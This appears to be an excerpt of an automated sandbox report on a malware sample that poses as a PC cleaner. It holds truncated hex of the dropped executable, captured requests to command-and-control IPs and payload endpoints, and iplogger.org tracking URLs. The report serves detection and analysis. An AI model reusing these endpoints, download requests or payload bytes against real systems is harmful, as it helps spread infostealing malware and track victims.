00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:42:20 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2

Source: global traffic

HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167

Source: file.exe, 00000000.00000000.265432136.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
Source: file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.279933925.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.266426572.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.284845815.000000000068C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte
Source: file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.279933925.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.266426572.0000000000663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteIN
Source: Cleaner.exe, 0000001E.00000002.642881680.0000022E6D105000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsup
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Cleaner.exe, 0000001E.00000002.635678816.0000022E00418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://iplogger.org
Source: Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Cleaner.exe, 0000001E.00000003.361219972.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.361078584.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: Cleaner.exe, 0000001E.00000003.361219972.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com.
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: Cleaner.exe, 0000001E.00000003.365415203.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364887394.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Cleaner.exe, 0000001E.00000003.365381080.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.365415203.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.366231899.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.365464280.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364887394.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com.
Source: Cleaner.exe, 0000001E.00000003.372842971.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Cleaner.exe, 0000001E.00000003.364266164.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Cleaner.exe, 0000001E.00000003.366066171.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.366036453.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Cleaner.exe, 0000001E.00000003.366036453.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlll.
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Cleaner.exe, 0000001E.00000003.372842971.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersiva
Source: Cleaner.exe, 0000001E.00000003.366231899.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF.
Source: Cleaner.exe, 0000001E.00000003.364960603.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364938213.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comH
Source: Cleaner.exe, 0000001E.00000003.364938213.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comitu8
Source: Cleaner.exe, 0000001E.00000003.364466049.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364386372.0000022E6B02F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comvaRegular
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Cleaner.exe, 0000001E.00000003.360298044.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Cleaner.exe, 0000001E.00000003.360298044.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn8
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/F.
Source: Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/H
Source: Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/x
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Cleaner.exe, 0000001E.00000003.357923180.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comb.
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Cleaner.exe, 0000001E.00000003.362419891.0000022E6B026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comx
Source: Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kralRegular
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.358211225.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.358174176.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.net.
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netF.
Source: Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netTTF.
Source: Cleaner.exe, 0000001E.00000003.367409088.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.de
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Cleaner.exe, 0000001E.00000003.360922906.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.
Source: Cleaner.exe, 0000001E.00000003.360922906.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.X
Source: file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	String found in binary or memory: https://g-cleanit.hk
Source: Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org
Source: file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	String found in binary or memory: https://iplogger.org/1Pz8p7
Source: Cleaner.exe, 0000001E.00000002.635650155.0000022E0040E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.orgx
Source: Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174

Source: unknown

DNS traffic detected: queries for: iplogger.org

Source: global traffic	HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
